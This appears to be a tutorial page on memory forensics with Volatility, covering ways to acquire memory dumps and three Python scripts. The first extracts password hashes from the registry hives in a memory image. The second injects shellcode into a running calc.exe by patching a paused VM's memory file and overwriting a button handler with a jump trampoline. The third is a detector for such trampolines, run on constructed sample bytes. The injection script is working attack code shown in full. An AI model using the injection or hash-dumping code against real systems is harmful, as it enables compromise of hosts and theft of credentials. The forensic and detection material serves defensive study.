Automated attack forensics
1. Volatility: Advanced Memory Forensics Framework
After a network intrusion, you need to confirm whether an attack actually took place, and that usually requires a memory snapshot of the infected host. Volatility can inspect kernel objects, detect and extract process memory, and provide forensic analysis of such a snapshot.
1.1 Environment setup and memory dump acquisition
The environment requires Python 2.7.
1.1.2 Linux (Kali)
In a shell, change into the volatility directory.
1.1.3 Generating a memory dump file
Volatility analyzes a memory dump file, so we first have to acquire a memory dump from the system suspected of being attacked. There are three main ways to obtain one:
- Use the Cuckoo sandbox to generate a memory dump
- Use VMware to generate a memory dump
- Use third-party software to capture a memory dump
1.1.5 Using VMware
Pause the virtual machine, then locate the *.vmem file in the VM's directory, for example:
1.1.6 Using third-party software to capture a dump
For physical machines, the following tools are commonly used to capture memory dumps:
- KnTTools
- F-Response
- Mandiant Memoryze
- HBGary FastDump
- MoonSols Windows Memory Toolkit
- AccessData FTK Imager
- EnCase/WinEn
- Belkasoft Live RAM Capturer
- ATC-NY Windows Memory Reader
- Winpmem
- Win32dd/Win64dd
- DumpIt
1.2 Using the tool
1.2.1 Behavior: dumping password hashes
The script below drives Volatility 2.3.1 from Python 2.7: it loads the WinXPSP2x86 profile, locates the SAM and SYSTEM hives in the registry, and runs the hashdump plugin against them.

```python
import sys
import struct

memory_file = "WinXPSP2.vmem"
sys.path.append("/Downloads/volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)

from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump

# Enumerate the registry hives present in the memory image
reg_api = RegistryApi(config)
reg_api.populate_offsets()

sam_offset = None
sys_offset = None

for offset in reg_api.all_offsets:
    # The hashdump plugin needs the virtual offsets of both the SAM and SYSTEM hives
    if reg_api.all_offsets[offset].endswith("\\SAM"):
        sam_offset = offset
        print "[*] SAM: 0x%08x" % offset

    if reg_api.all_offsets[offset].endswith("\\system"):
        sys_offset = offset
        print "[*] System: 0x%08x" % offset

    if sam_offset is not None and sys_offset is not None:
        config.sys_offset = sys_offset
        config.sam_offset = sam_offset

        hashdump = HashDump(config)
        for hash in hashdump.calculate():
            print hash
        break

if sam_offset is None or sys_offset is None:
    print "[*] Failed to find the system or SAM offsets."
```
1.2.2 Behavior: direct code injection
The script below uses Volatility's Win2003SP2x86 profile to find calc.exe in a paused VM's .vmem file, writes a shellcode blob into a run of zero bytes in one of the process's pages, and patches a trampoline over the handler at the given virtual address so that it jumps to the shellcode.

```python
import sys
import struct

equals_button = 0x01005D51
memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"
slack_space = None
trampoline_offset = None

# Read in our shellcode
sc_fd = open("cmeasure.bin", "rb")
sc = sc_fd.read()
sc_fd.close()

sys.path.append("/Downloads/volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)

config.parse_options()
config.PROFILE = "Win2003SP2x86"
config.LOCATION = "file://%s" % memory_file

import volatility.plugins.taskmods as taskmods

p = taskmods.PSList(config)

for process in p.calculate():
    if str(process.ImageFileName) == "calc.exe":
        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
        print "[*] Hunting for physical offsets...please wait."

        address_space = process.get_process_address_space()
        pages = address_space.get_available_pages()

        for page in pages:
            # Translate the page's virtual address to its offset in the .vmem file
            physical = address_space.vtop(page[0])

            if physical is not None:
                if slack_space is None:
                    fd = open(memory_file, "r+b")
                    fd.seek(physical)
                    buf = fd.read(page[1])

                    try:
                        # Look for a run of zero bytes large enough to hold the shellcode
                        offset = buf.index("\x00" * len(sc))
                        slack_space = page[0] + offset

                        print "[*] Found good shellcode location!"
                        print "[*] Virtual address: 0x%08x" % slack_space
                        print "[*] Physical address: 0x%08x" % (physical + offset)
                        print "[*] Injecting shellcode."

                        fd.seek(physical + offset)
                        fd.write(sc)
                        fd.flush()

                        # Create our trampoline: mov ebx, <shellcode VA> ; jmp ebx
                        tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
                        tramp += "\xff\xe3"

                        if trampoline_offset is not None:
                            break
                    except ValueError:
                        pass

                    fd.close()

                # Check whether this page contains our target code location
                if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):
                    # Calculate the virtual offset within the page
                    v_offset = equals_button - page[0]
                    # Now calculate the physical offset in the file
                    trampoline_offset = physical + v_offset

                    print "[*] Found our trampoline target at: 0x%08x" % trampoline_offset

                    if slack_space is not None:
                        break

if slack_space is None or trampoline_offset is None:
    print "[*] Could not find both a shellcode location and the trampoline target."
    sys.exit(1)

print "[*] Writing trampoline..."
fd = open(memory_file, "r+b")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()

print "[*] Done injecting code."
```
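The injection above leaves two traces in the process's pages: a 7-byte mov ebx, imm32 ; jmp ebx trampoline over the original handler bytes, and a payload written into padding that used to be zero. The detection-side counterpart, as an added Python 3 example that is not from the original page and does not need Volatility, diffs a captured code page against a known-good copy (assumed to come from the on-disk executable or a clean snapshot), groups the patched bytes into runs, and decodes any trampoline to report where it jumps; the page base 0x01005000 is derived from the page's 0x01005D51 address, and the payload location and the byte contents of both pages are constructed.

```python
import struct

def diff_offsets(baseline, captured):
    """Offsets within the page where the captured bytes differ from the known-good copy."""
    if len(baseline) != len(captured):
        raise ValueError("page sizes differ")
    return [i for i, (b, c) in enumerate(zip(baseline, captured)) if b != c]

def group_runs(offsets):
    """Collapse sorted offsets into [start, length] runs of contiguous patched bytes."""
    runs = []
    for off in offsets:
        if runs and off == runs[-1][0] + runs[-1][1]:
            runs[-1][1] += 1
        else:
            runs.append([off, 1])
    return runs

def decode_trampoline(captured, off):
    """Return the jump target if the bytes at off are 'mov ebx, imm32 ; jmp ebx' (BB imm32 FF E3)."""
    chunk = captured[off:off + 7]
    if len(chunk) == 7 and chunk[0] == 0xBB and chunk[5:] == b"\xff\xe3":
        return struct.unpack("<I", chunk[1:5])[0]
    return None

def analyze_page(baseline, captured, page_va):
    """List every patched run in a code page and, where one starts with a trampoline, its target."""
    findings = []
    for start, length in group_runs(diff_offsets(baseline, captured)):
        target = decode_trampoline(captured, start) if length >= 7 else None
        findings.append({"va": page_va + start, "length": length, "trampoline_target": target})
    return findings

# Constructed sample: calc.exe page at VA 0x01005000 ('=' handler at 0x01005D51); the known-good
# copy is pseudo-random "code" followed by 0x100 zero bytes of section padding (slack).
PAGE_VA = 0x01005000
BASELINE = bytes((i * 73 + 11) % 256 for i in range(0xF00)) + b"\x00" * 0x100
SHELLCODE_VA = 0x01005F00            # hypothetical: start of the zero run the injector reused
FAKE_SHELLCODE = b"\xcc" * 16        # placeholder bytes standing in for a payload
TRAMP = b"\xbb" + struct.pack("<I", SHELLCODE_VA) + b"\xff\xe3"   # mov ebx, imm32 ; jmp ebx
_captured = bytearray(BASELINE)
_captured[0xD51:0xD51 + 7] = TRAMP               # patched '=' handler entry
_captured[0xF00:0xF00 + 16] = FAKE_SHELLCODE     # payload written into the padding
CAPTURED = bytes(_captured)

def sample_findings():
    return analyze_page(BASELINE, CAPTURED, PAGE_VA)
if __name__ == "__main__":
    for f in sample_findings():
        tgt = "0x%08x" % f["trampoline_target"] if f["trampoline_target"] is not None else "none"
        print("patched %d bytes at 0x%08x, trampoline target: %s" % (f["length"], f["va"], tgt))
```

Against a real image, pull the page bytes with the process address space used in the script above and the baseline from the same page of the on-disk binary; a trampoline whose target lies in writable or padding memory is the signature to alert on.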
Python automated attack script